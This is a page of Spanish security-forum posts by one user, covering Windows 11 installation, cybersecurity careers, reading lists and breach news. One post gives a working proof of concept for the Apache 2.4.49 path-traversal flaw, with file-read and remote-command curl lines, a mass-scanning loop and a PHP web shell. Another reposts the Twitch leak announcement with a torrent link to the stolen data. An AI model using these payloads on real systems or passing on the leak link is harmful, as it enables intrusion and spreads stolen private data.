últimos mensajes de: el-brujo - Página 89

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

17 Mayo 2024, 12:58 pm

Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET

Mostrar Mensajes
Páginas: 1 ... 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 [89] 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 ... 630

881	Sistemas Operativos / Windows / Re: Windows 11	en: 6 Octubre 2021, 12:29 pm
¿Qué programa has usodo para hacerlo booteable? ¿Rufus? ¿Qué tamaño es el pendrive? Mejor usa la herramienta de Microsoft, Windows Media Creation Tool: MediaCreationToolW11.exe https://go.microsoft.com/fwlink/?linkid=2156295 Disponible en: https://www.microsoft.com/es-es/software-download/windows11 El tamaño mínimo del pendrive USB tiene que ser 8GB

882	Seguridad Informática / Bugs y Exploits / Grave Vulnerabilidad en servidor web Apache 2.4.49 CVE-2021-41773	en: 6 Octubre 2021, 12:07 pm
CVE-2021-41773 POC La vulnerabilidad sólo funciona con Apache HTTP 2.4.49 Y según Shodan: hay 112,755 Apache Server 2.4.49 Citar 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd Citar cat targets.txt \| while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" \| grep "root:*" && echo "$host \033[0;31mVulnerable\n" \|\| echo "$host \033[0;32mNot Vulnerable\n";done Citar curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname' uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux Código: <?php echo system($_GET['c']); ?> Local file disclosure Citar $ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" Remote Code Execution Citar $ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" Bug https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782

883	Foros Generales / Sugerencias y dudas sobre el Foro / Re: ¿cual fue mi error?	en: 6 Octubre 2021, 11:45 am
Cita de: Dani-el soldado de Dios en 5 Octubre 2021, 23:36 pm Bien, digo x las dudas ¿no deberían notificar al autor del post?, digo, (sin que se ensanche mi ego), me considero un tipo muy inteligente pero ¿adivino? no lo sabia.- Lo siento mucho porque comenzaba a confiar mucho en vos tocayo, tengo 70 años y ya no pienso concurrir a una universidad, me apoyo mucho en los foros y en este hay gente muy amable y comprensiva, no todos claro.- Hasta siempre a todos.- En principio, si tienes las notificaciones activadas recibes un e-mail dónde te indica quién ha movido el tema y dónde lo ha movido. Sentirse ofendido porque han borrado un mensaje que no incumple las reglas lo entiendo, pero irse del foro porque te han movido un mensaje y nadie te lo ha comunicado, pues me parece un poco exagerado.... Entiende que los moderadores y resto del staff intentan tener el foro lo más ordenado posible. Antes (hace años) se había dejado el mensaje de movido para encontrar más fácilmente el mensaje movido, pero al final quedaban bastantes mensajes movidos que al final molestaban

884	Foros Generales / Foro Libre / Hackean Twitch y filtran en un torrent 128GB datos privados	en: 6 Octubre 2021, 11:35 am
Citar > Entirety of twitch.tv, with commit history going back to its early beginnings > Mobile, desktop and video game console Twitch clients > Various proprietary SDKs and internal AWS services used by Twitch > Every other property that Twitch owns including IGDB and CurseForge > An unreleased Steam competitor from Amazon Game Studios > Twitch SOC internal red teaming tools (lol) AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making! twitch leaks part one Anonymous Torrent (128GB): magnet:?xt=urn:btih:N5BLZ6XECNEHHARHJOVQAS4W7TWRXCSI&dn=twitch-leaks-part-one&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce Repository listing: https://dpaste.org/MvoM Jeff Bezos paid $970 million for this, we're giving it away FOR FREE. - Torrent con 125GB datos filtrados La carpeta twitch-payouts es muy interesante Filtradas también las ganancias dinero de Españoles ¿Cuánto dinero ganan Ibai y AuronPlay al mes en Twitch? Fuente: https://boards.4channel.org/g/thread/83691438#p83691438 mensaje original Citar We bring to you today an extremely poggers leak: Twitch is an American video live streaming service that focuses on video game live streaming, including broadcasts of esports competitions, operated by Twitch Interactive, a subsidiary of Amazon.com, Inc. Their community is also a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories, including: > Entirety of twitch.tv, with commit history going back to its early beginnings > Mobile, desktop and video game console Twitch clients > Various proprietary SDKs and internal AWS services used by Twitch > Every other property that Twitch owns including IGDB and CurseForge > An unreleased Steam competitor from Amazon Game Studios > Twitch SOC internal red teaming tools (lol) AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making! Torrent (128GB): magnet:?xt=urn:btih:N5BLZ6XECNEHHARHJOVQAS4W7TWRXCSI&dn=twitch-leaks-part-one&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce Repository listing: https://dpaste.org/MvoM Jeff Bezos paid $970 million for this, we're giving it away FOR FREE. #DoBetterTwitch

885	Sistemas Operativos / Windows / Re: Ya ha salido windows 11., ¿que hacer para actualizar mi ordenador portatil?	en: 6 Octubre 2021, 10:17 am
Gracias SonGoku, si mejor utilizar Windows Media Creation Tool ya que crea la unidad arrancable (booteable) de Windwos 11 automáticamente. Opino lo mismo, ya habrá tiempo de usar Windows 11 más adelante, es muy pronto para hacer cambios. Si eres un entusiasta de Windows pues adelante, pero son ganas de complicarse la vida e la mayoría de los casos. Citar ¿Entonces no actualizo ni instalo ni la ISO de windows 11? 11 razones por las que no hace falta actualizar a Windows 11 - Windows 10 no se va a quedar sin soporte - Windows 10 seguirá recibiendo nuevas características - Windows 10 también recibirá algunas de las novedades clave de Windows 11 - No veremos las aplicaciones Android todavía - Los cambios "revolucionarios" en diseño, no son tal - Es un sistema al que le falta madurez - Varias de las mejoras de Windows 11 se pueden tener en Windows 10 fácilmente - Las nuevas apps por defecto tienen poco de esenciales - Vas a perder funciones que llevan años en Windows - Valdrá más la pena en octubre de 2022 Fuente: https://www.genbeta.com/windows/11-razones-que-no-hace-falta-actualizar-a-windows-11

886	Seguridad Informática / Seguridad / ¿Cómo iniciarse en ciberseguridad? Titulaciones y certificaciones Seguridad Informática	en: 5 Octubre 2021, 17:36 pm
5 funcionalidades principales dentro del ciclo de vida de la gestión de riesgos de ciberseguridad de una organización: - Identificar: especialistas en Governance Risk and Compliance (GRC) se encargan de la identificación y prevención de amenazas, proporcionando información para decidir de la mejor manera dónde y cómo destinar recursos para mejorar la seguridad, mitigando los riesgos allí donde existan y sean más elevados, tanto a nivel técnico como organizativo. - Proteger: arquitectos y administradores de seguridad, ingenieros y técnicos de sistemas y de redes y especialistas en devops que son los encargados de diseñar, operar y mantener actualizados las diferentes plataformas de seguridad. Con tanta diversidad de productos y fabricantes a menudo requieren formaciones específicas. - Detectar: analistas del SOC, analistas de ciberinteligencia (estos más trasversales), threat hunters, analistas de malware, especialistas en SIEM, hackers éticos (aquí incluyo pentesters y red/purple teamers) y otros encargados de analizar y detectar los fallos y las vulnerabilidades de los sistemas de la empresa. Requieren la adopción de soluciones de monitorización continua que detecten actividad anómala y otras amenazas a la continuidad operativa. La parte ofensiva se encarga de simular adversarios de cara a poner a prueba y mejorar estos sistemas de detección. - Responder: especialistas en respuesta ante incidentes y analistas forenses. Encargados de recopilar y analizar información sobre el incidente, realizar todas las actividades necesarias para contenerlo y erradicarlo e incorporar las lecciones aprendidas en las estrategias de respuesta revisadas. - Recuperar: profesionales enfocados a desarrollar e implementar actividades efectivas para restaurar las capacidades o los servicios que se vieron afectados debido a un incidente. Las organizaciones deben contar con un plan de recuperación, poder coordinar las actividades de restauración con partes externas e incorporar las lecciones aprendidas en su estrategia de recuperación actualizada. Además cuando entréis en una empresa seguro que os hablarán o escucharéis opr los pasillos acerca del CSO, CISO y del DPO. Para que no os pillen fuera de juego os dejo también qué significa y debe hacer cada uno: CSO (Chief Security Officer): es el responsable de la seguridad de la empresa y se ocupa de establecer los planes de continuidad de negocio y recuperación de desastres, comprender las necesidades normativas y asegurarse de que todas las actividades son planificadas y ejecutadas para satisfacer los objetivos de la empresa. En empresas pequeñas el CISO y el CSO pueden coincidir. CISO (Chief Information Security Officer): es el director de seguridad de la información, cuya función es alinear la seguridad de la información con los objetivos de negocio. Establece las políticas de seguridad de la empresa y las medidas y controles necesarios. Delegado de Protección de Datos (DPO): responsable de informar y asesorar a todos los empleados de la organización sobre las obligaciones a que están sujetos por la normativa, además de supervisar su cumplimiento y actuar como punto de contacto con la autoridad competente. Es una figura introducida por el nuevo GDPR. En ciertas categoría de organizaciones, puede coincidir con el Compliance Officer. ¿Qué estudiar para dedicarse a seguridad informática? Si quieres valorar esta opción te aconsejo que eches un vistazo a los catálogos de formación de seguridad que pone a nuestra disposición el INCIBE (Instituto Nacional de Ciberseguridad): El Catálogo de másteres en ciberseguridad en España recopila un total de 76 programas de Máster y 3 Grados. https://www.incibe.es/sites/default/files/paginas/talento/catalogos-formacion/catalogo-masteres.pdf El Catálogo de instituciones que ofrecen formación en ciberseguridad en España reúne 120 centros donde se puede realizar algún estudio en ciberseguridad, en modalidad máster o en otro formato. https://www.incibe.es/sites/default/files/paginas/talento/catalogos-formacion/catalogo-instituciones.pdf Certificaciones certificaciones. Si me preguntaras por el tema de hacking te diría que ahora en España claramente hay una tendencia hacia el OSCP (hace muchos años era el CEH) pero siempre va a depender un poco del puesto concreto que quieras desempeñar. En cualquier caso, el número de certificaciones se ha disparado también con el paso de los años. Prueba de ello es el espectacular mapa de Paul Jeremy: Fuente: https://www.hackplayers.com/2021/10/como-iniciarse-en-ciberseguridad.html

887	Foros Generales / Dudas Generales / Re: Listado de libros para principiantes.	en: 5 Octubre 2021, 17:17 pm
Recopilación de algunos libros "imprescindibles" para aprender seguridad informática El resultado de los libros que sugeristeis fue el siguiente: Citar Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning de Gordon “Fyodor” Lyon. A Bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security de Tobias Klein. Malware, Rootkits & Botnets: A Beginner’s Guide de Christopher C. Elisan. Las colecciones completas de la Liga de la Justicia, Batman y el Escuadrón suicida de DC Comics. Hacking Exposed: Network Security Secrets & Solutions de Stuart McClure, Joel Scambray y George Kurtz. Hacking: The Art of Exploitation de Jon Erickson. BackTrack 5 Wireless Penetration Testing Beginner’s Guide de Vivek Ramachandran. Unauthorised Access: Physical Penetration Testing For IT Security Teams de Wil Allsopp y Kevin Mitnick. Metasploit: The Penetration Tester’s Guide por David Kennedy , Jim O’Gorman , Devon Kearns y Mati Aharoni. Rtfm: Red Team Field Manual de Ben Clark. The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography de Simon Singh. Pentesting con Kali de Pablo González, Germán Sánchez y Jose Miguel Soriano. Metasploit para Pentesters de Pablo González y Chema Alonso. The Database Hacker’s Handbook: Defending Database Servers de David Litchfield , Chris Anley, John Heasman, Bill Grindlay. Owasp Zed Attack Proxy Guide de @BalderramaEric y @sniferl4bs. The Antivirus Hacker’s Handbook de Joxean Koret y Elias Bachaalany. The Rootkit Arsenal: Escape and Evasion de Bill Blunden. Rootkits: Subverting the Windows Kernel de Greg Hoglund y Jamie Butler. The Browser Hacker’s Handbook de Wade Alcorn, Christian Frichot, Michele Orru. Network Security Essentials Applications and Standards de William Stallings. Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers de T.J. O’Connor. Cuadernos Rubio de Ramón Rubio. Android Security cookbook de Keith Makan, Scott Alexander-Bown. The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory Practical Malware Analysis por Michael Hale Ligh , Andrew Case, Jamie Levy, Aaron Walters. Malware Analyst’s Cookbook de Michael Hale Ligh , Matthew Richard , Steven Adair , Blake Hartstein. The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws de Dafydd Stuttard , Marcus Pinto. Official (ISC)² Guide to the CISSP CBK de Adam Gordon. Neuromante de William Gibson. The Cuckoo’s Egg de Clifford Stoll. Hacking Ético de Carlos Tori. Google Hacking for Penetration Testers de by Johnny Long (Author), Bill Gardner (Author), Justin Brown (Author). E-mail Virus Protection Handbook : Protect your E-mail from Viruses, Tojan Horses, and Mobile Code Attacks de by Syngress (Author), James Stanger (Author). Fuente: https://www.securityartwork.es/2016/02/12/recopilacion-de-algunos-libros-imprescindibles-para-aprender-seguridad-informatica-secbook/

888	Sistemas Operativos / Windows / Re: Ya ha salido windows 11., ¿que hacer para actualizar mi ordenador portatil?	en: 5 Octubre 2021, 17:07 pm
En tu caso Win_7, mejor no toques nada, ni actualices Windows, no vale la pena Para los que quieran descargar la ISO de Windows 11 ya está disponible oficialmente. - Win11_Spanish_x64.iso ocupa 5,52 GB https://ns2.elhacker.net/isos-windows/Win11_Spanish_x64.iso md5sum 4f269856f443153de2436fe478358764 sha256sum 83a405d023cc6d97308560d3fb3f240584afb88c589988eda71a4d26e2b13e43 Descargada de: https://www.microsoft.com/es-mx/software-download/windows11

889	Foros Generales / Foro Libre / Re: Duda sobre los papeles de pandora	en: 5 Octubre 2021, 12:39 pm
Citar ¿sabéis donde puedo descargarme la lista? - 2,94TB datos filtrados - 6,4 millones documentos de texto - 4 millones de PDF No he visto ningún sitio para descargarlo, todavía. Muchos enlaces, en muchos medios y muchas noticias: Pero el artículo original: https://www.icij.org/investigations/pandora-papers/global-investigation-tax-havens-offshore/

890	Foros Generales / Noticias / Re: Telegram gana más de 50 millones de nuevos usuarios tras la caída global de las principales redes sociales	en: 5 Octubre 2021, 12:34 pm
Mucha gente se bajó Telegram para luego no volverlo a usar, cuando ya funciona WhatsApp. E incluso los SMS resucitaron durante la caída de Facebook El SMS resurge durante la caída de WhatsApp con 14 veces más mensajes enviados https://bandaancha.eu/articulos/sms-resurgio-durante-caida-whatsapp-14-10025

Páginas: 1 ... 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 [89] 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 ... 630

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines